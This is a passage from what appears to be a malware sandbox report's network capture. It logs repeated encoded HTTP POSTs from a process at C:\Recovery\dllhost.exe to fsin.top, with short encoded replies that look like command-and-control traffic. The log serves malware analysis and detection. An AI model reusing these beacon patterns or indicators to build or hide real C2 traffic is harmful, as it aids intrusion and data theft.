                                                  Aug 1, 2024 07:38:28.319014072 CEST | 1012 | OUT | Data Raw: 51 55 5d 57 5a 5c 5d 54 5c 5e 5a 51 54 51 57 52 57 5e 5e 58 56 5d 51 5d 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QU]WZ\]T\^ZQTQWRW^^XV]Q][]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"'!=]"4[$5#(;)?%2(71?&_%U</X/"&5&G#.X!
                                                  Aug 1, 2024 07:38:28.412509918 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:28.651263952 CEST | 584 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:28 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qU0N44sLN7uYF11AQJCLORo5XUN4hzhWAQOOBcDHP11svCi1PqgnMkUBLrvk5emunUqxdzM%2FONIf%2B7U2zaasxH4LFw%2BGqbeYIFC0AMJRoY8l0U7A5npLbLSlYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b6f4b9b41c1-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  86 | 192.168.2.4 | 49823 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:28.700658083 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1284
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:29.052886009 CEST | 1284 | OUT | Data Raw: 54 5e 58 50 5a 5c 58 52 5c 5e 5a 51 54 57 57 53 57 56 5e 59 56 5f 51 55 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T^XPZ\XR\^ZQTWWSWV^YV_QU[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"%!)5>?'53Y<+>%918;P&<"^%3/8!#\%&G#.X!
                                                  Aug 1, 2024 07:38:29.156270981 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:29.405386925 CEST | 733 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:29 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qBqtDTAswIgUzzFgE3JoZ2uR9CzeY5yF2baaCLHFBJG8LBIEyPNx4oXyKo%2FE8%2FXCAQGR0TgbU%2BkU3kKVmtP1LQM3f9MsRbvchPdjyhSsubcC1c1M0v1rnOLSOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b73fbd142ad-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 21 08 24 38 07 0f 36 39 24 53 29 21 21 51 2a 55 23 02 2b 17 06 01 31 3c 39 5e 31 5e 34 55 20 3f 25 5b 26 2f 0b 0f 26 22 00 13 3d 27 21 51 04 11 26 5d 34 23 3a 14 3d 39 33 58 25 2b 3c 02 34 50 24 11 33 0d 2d 51 35 00 28 5d 29 0b 39 5a 29 31 33 52 39 3b 38 00 3c 30 30 5a 25 36 2a 56 0d 17 22 51 2d 28 2b 09 30 31 38 1c 34 05 3b 11 21 38 2e 01 3d 06 32 5d 2a 42 32 13 2c 33 06 06 28 30 2e 57 28 2e 26 03 3e 3a 0c 0b 27 29 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98!$869$S)!!Q*U#+1<9^1^4U ?%[&/&"='!Q&]4#:=93X%+<4P$3-Q5(])9Z)13R9;8<00Z%6*V"Q-(+0184;!8.=2]*B2,3(0.W(.&>:')"],-H=YM0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  87 | 192.168.2.4 | 49824 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:28.812093973 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:29.162136078 CEST | 1012 | OUT | Data Raw: 54 57 58 5d 5f 5e 58 57 5c 5e 5a 51 54 50 57 50 57 52 5e 5a 56 5d 51 5f 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TWX]_^XW\^ZQTPWPWR^ZV]Q_[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!31*5''S<<(->59&+R%/$#/,>/! 25&G#.X!<
                                                  Aug 1, 2024 07:38:29.259375095 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:29.417229891 CEST | 594 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:29 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kEL%2BqJrrWJDB2nyzuuTgmhPV7ShBwCPcC92Wp73XoF8XwBvfJZM8RwC%2Bt8OfHw7iR0RRr%2FC89B1SIx3%2Bd%2BuKf%2FkLxwlE0sPAPFW0hgan9fDGegJ6a%2F%2BQGspByA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b749cde7ce7-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  88 | 192.168.2.4 | 49825 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:29.538949966 CEST | 250 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:38:29.896848917 CEST | 1012 | OUT | Data Raw: 54 5f 58 57 5a 5a 58 5c 5c 5e 5a 51 54 53 57 52 57 56 5e 57 56 55 51 5f 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T_XWZZX\\^ZQTSWRWV^WVUQ_[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!$)["?'\)+6T>5&1$&Y.&#/.;#+ &%&G#.X!0
                                                  Aug 1, 2024 07:38:30.008982897 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:30.161134005 CEST | 586 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:30 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sos%2FBPEnN3ad6fnjI512XkOy27akO7dSkIF6c0rljTwtobi4R7G1xgntZsclMx%2B4ateS8183E9YZ6kDhLhgXemmlvlyTPPzT%2BXPUKT596Q%2Fagi4iQgiUDKp2Lg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b794eb243e0-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  89 | 192.168.2.4 | 49826 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:30.311141014 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:30.679275036 CEST | 1012 | OUT | Data Raw: 54 5e 58 53 5a 55 58 51 5c 5e 5a 51 54 5f 57 56 57 53 5e 5f 56 5f 51 5a 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T^XSZUXQ\^ZQT_WVWS^_V_QZ[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"3&!$Z'/+>5%8,&/&^1 <8.<#(8&%&G#.X!
                                                  Aug 1, 2024 07:38:30.782387018 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:31.038536072 CEST | 581 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:30 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vc3MCU203LFHfRGSDMgBarpeeN7GwLHbC4ItrPLoEjyEE0OhpKNAyT6W78%2Bzka7Gq%2BhujRRHF%2BC8FJTPZ2cTgBmKu5HQY4MdqgEcHzENGq4EavjC2FbUTMO%2FlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b7e09340f42-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a
                                                  Data Ascii: 40W[Y
                                                  Aug 1, 2024 07:38:31.130588055 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  90 | 192.168.2.4 | 49827 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:31.257999897 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:31.615725994 CEST | 1012 | OUT | Data Raw: 54 55 58 50 5f 5e 58 5c 5c 5e 5a 51 54 5e 57 54 57 51 5e 56 56 5a 51 58 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TUXP_^X\\^ZQT^WTWQ^VVZQX[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!%":"-8[3?+(1*6>\28#P2*1 T;?^5^7X'5&G#.X!
                                                  Aug 1, 2024 07:38:31.703639030 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:31.918080091 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:31.940352917 CEST | 586 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:31 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PPp%2FkpFlBXO9mObquQQWtWrjufgfaMZ1Pzw%2F5C9kf9xJxkDbsVLR6YtfEmw5EL%2Fm%2B1T8IjodI31N2EilDvqnnWupuatAhTAvks3xU91RUzHn5kPhkZjaPk0NFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b83d85cc326-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  91 | 192.168.2.4 | 49828 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:32.075002909 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:32.428235054 CEST | 1008 | OUT | Data Raw: 54 50 58 55 5f 5e 5d 50 5c 5e 5a 51 54 56 57 55 57 55 5e 57 56 55 51 5e 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TPXU_^]P\^ZQTVWUWU^WVUQ^[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Z$2)5=8X3%?\<82W*&!2?R&,2^%38 68&5&G#.X!<
                                                  Aug 1, 2024 07:38:32.531980038 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:32.773020983 CEST | 586 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:32 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RLzOpiEChnMSGtR1IpDiSjvZt8ihqxBH6Hud0hGadDwW8j%2FS4FuoaftiVlUVCh6MIf3M%2FPuocvZOJl9PwwaNZOImPjv8Cz5kBlcRT%2BPuxUowp6FOQB8bf%2FU6uA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b890beb4321-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  92 | 192.168.2.4 | 49829 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:32.901392937 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:33.256136894 CEST | 1012 | OUT | Data Raw: 51 53 5d 57 5f 5e 58 54 5c 5e 5a 51 54 55 57 56 57 50 5e 57 56 59 51 5d 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QS]W_^XT\^ZQTUWVWP^WVYQ][]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"_'"6.'$?<(.=%.1 %&T8=?5(%&G#.X!(
                                                  Aug 1, 2024 07:38:33.354757071 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:33.614284992 CEST | 588 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:33 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MtAOFGFYqyZqdQZV5jiLGovzc5OKA%2Fzo29fTQZDmWI6nOPHbNthIN5irIsIzPZsYUO3jgDGMJ%2BWkFMmC3tI3TAwOLP%2Br4kRREGS8aTUc6x7wStGh%2BWX6pZi%2FQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b8e2a2b0cc4-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  93 | 192.168.2.4 | 49830 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:33.759836912 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:34.115406036 CEST | 1012 | OUT | Data Raw: 54 56 5d 56 5a 5f 58 50 5c 5e 5a 51 54 57 57 53 57 54 5e 5d 56 5f 51 5f 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TV]VZ_XP\^ZQTWWSWT^]V_Q_[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"$T%]!#'5;X(+1=6)1;?%/"$3$-.(#8#%&G#.X!
                                                  Aug 1, 2024 07:38:34.244972944 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  94 | 192.168.2.4 | 49831 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:34.418827057 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1284
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:34.772032976 CEST | 1284 | OUT | Data Raw: 54 52 5d 50 5a 5e 5d 54 5c 5e 5a 51 54 54 57 54 57 57 5e 56 56 59 51 5e 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TR]PZ^]T\^ZQTTWTWW^VVYQ^[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"%1:!-4X$6;Y(8-=%6&7%6X&?,;_"(,1&G#.X!,
                                                  Aug 1, 2024 07:38:34.861565113 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:35.057178974 CEST | 735 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:35 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ha7afMufcEzOKQMVgDh%2FavTFkS1My%2BneG4o51kWigKXV72328kjfDri3%2F6ToFPSGbCJiYQqOrCvsLAvLOxtg71waLkEPpDa%2BynqejdUE6TQMqllInI5TIXCigA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b979fb24303-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 22 51 33 01 3a 1c 36 14 33 0a 3d 0c 00 0b 3e 33 38 17 3c 5f 2f 5f 25 3f 22 01 27 28 28 1f 21 02 3d 5c 33 01 04 55 25 0b 2d 01 2a 1d 21 51 04 11 26 14 37 33 29 05 3d 5f 2f 58 24 38 3c 07 23 18 33 02 27 23 29 13 22 39 12 1b 3d 21 21 1e 3f 1c 0d 52 2f 3b 3c 07 3f 0d 0a 58 31 1c 2a 56 0d 17 22 50 2d 38 34 56 26 22 3b 0e 20 2c 02 0c 23 3b 3a 03 29 11 25 00 2a 0a 22 1d 2d 33 37 5e 3d 0a 32 52 2a 2d 0f 13 2b 39 2d 50 33 39 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98"Q3:63=>38<_/_%?"'((!=\3U%-*!Q&73)=_/X$8<#3'#)"9=!!?R/;<?X1*V"P-84V&"; ,#;:)%*"-37^=2R*-+9-P39"],-H=YM0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  95 | 192.168.2.4 | 49832 | 172.67.203.2 | 80 | 7288 | C:\Recovery\dllhost.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Aug 1, 2024 07:38:34.544436932 CEST | 274 | OUT | POST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:34.896852970 CEST | 1012 | OUT | Data Raw: 51 50 58 56 5a 5b 58 5c 5c 5e 5a 51 54 5e 57 55 57 5f 5e 58 56 55 51 5a 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QPXVZ[X\\^ZQT^WUW_^XVUQZ[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"[3["-$;^);%)%*^1 %1#4T,/^"?%&G#.X!
                                                  Aug 1, 2024 07:38:34.989065886 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:35.152575016 CEST | 584 | IN | HTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:35 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
